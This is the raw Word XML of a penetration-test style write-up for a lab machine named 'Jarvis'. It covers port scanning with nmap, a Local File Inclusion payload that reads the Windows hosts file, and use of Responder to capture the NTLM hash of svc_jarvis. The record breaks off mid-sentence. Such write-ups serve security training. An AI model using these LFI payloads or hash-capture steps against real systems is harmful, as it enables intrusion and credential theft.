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36gh2so4drvj"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1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.n8lqu1if4h0s" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>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5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Jarvis</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. machine. If you need support, please open a ticket in the s. </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">upport channel on the Discord server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.zgz570g2y8a2" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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During the enumeration phase, a scan of open ports and exposed services was performed against the target. The analysis identified several externally accessible services, indicating a broad attack surface. The open ports discovered were: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80/TCP – HTTP, 8000/TCP – Web Service, 88/TCP – Kerberos, 445/TCP – SMB, 389/TCP – LDAP, 5985/TCP – WinRM, and 3389/TCP – RDP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. These represent the most relevant services identified during the initial scan and are potential points of interest for exploitation and further analysis.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">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nmap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--min-rate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&lt;machine-ip&gt;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-vvv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">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282552"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="83"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5943600" cy="3282552"/>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861925"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="85"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43600" cy="4861925"/>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Web service analysis began with port 80/TCP, where a button labeled </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“Jarvis Industries”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was identified on the main interface, suggesting the existence of additional functionality or internal pages associated with this component.</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03688"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="84"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5943600" cy="220368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Upon clicking this button, the browser was redirected to the domain </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jarvis.hc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicating the presence of an additional subdomain linked to the analyzed environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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78770"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="87"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4787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adding this subdomain to the Linux </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resolution, direct access became possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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75238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="86"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5943600" cy="3175238"/>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Within this domain, a button labeled </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“AI Academy”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was identified. When clicked, it redirected the user to the subdomain </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">academy.jarvis.hc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, indicating the presence of another complementary web service within the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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164570"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="89"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5943600" cy="316457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Upon accessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">academy.jarvis.hc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a parameter used to load internal resources was identified within the web application. Analysis demonstrated that this parameter dynamically accepts file paths, allowing references to files stored on the server itself. This behavior characterizes a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local File Inclusion (LFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability, which may result in unauthorized access to internal system files and exposure of sensitive information. </w:t>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Through exploitation of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability, it was possible to access internal operating system files. Among the retrieved artifacts, the Windows hosts configuration file located at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\drivers\etc\hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, was accessed, demonstrating that the server allowed reading of sensitive system components.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">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D">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http://academy.jarvis.hc/?page=C:\\Windows\\System32\\drivers\\etc\\hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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14456"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="88"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3014456"/>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presence of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local File Inclusion (LFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability significantly expands the attack surface, as beyond allowing access to internal files, it may under certain conditions be leveraged as a vector for more advanced attacks, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM Relay</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NTLM Relay</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack occurs when an attacker induces the vulnerable server to perform an external request that includes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">credentials. When the application contains </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or resource-loading functionality that can be manipulated, it becomes possible to direct such requests to a server controlled by the attacker. By doing so, the attacker captures the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash and can relay those credentials to another internal service that accepts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authentication, obtaining unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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To capture the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash sent by the server, a service was configured to intercept </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authentication attempts. For this purpose, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Responder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Fonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tool was used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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5">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tun0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-wd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">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13413"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="92" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="38134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It was possible to obtain the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_jarvis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through exploitation of the </w:t>
      </w:r>
